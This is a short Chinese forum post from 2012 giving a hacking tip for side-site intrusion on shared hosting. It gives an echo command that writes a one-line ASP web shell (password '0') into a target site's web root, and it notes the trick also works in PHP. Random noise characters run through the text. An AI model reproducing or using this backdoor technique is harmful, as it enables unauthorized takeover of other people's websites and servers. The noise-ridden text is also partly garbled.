在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
H+ U; C, J- K I; a& _+ N, J! g" T0 L6 o5 l3 b7 D/ ?1 {0 D/ B6 @
命令格式( N9 i1 s* `( _+ |8 h
4 C- g: G$ x* s
Echo 语句 >目标站绝对目录
" ~5 p, {+ p j. E @2 t9 \7 ]2 f5 g. R( @/ |" y5 s. G
例如: 4 P2 O1 \6 V6 B/ ]* M' V+ R/ N5 c
{5 D R9 ^" m) t+ uecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp+ E h! I1 _: r7 l
5 ?. h3 y6 R/ O7 K n' I
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。& R6 n* }9 q1 m' e8 n
|
发表于 2012-9-23 14:40:24
收藏
支持
反对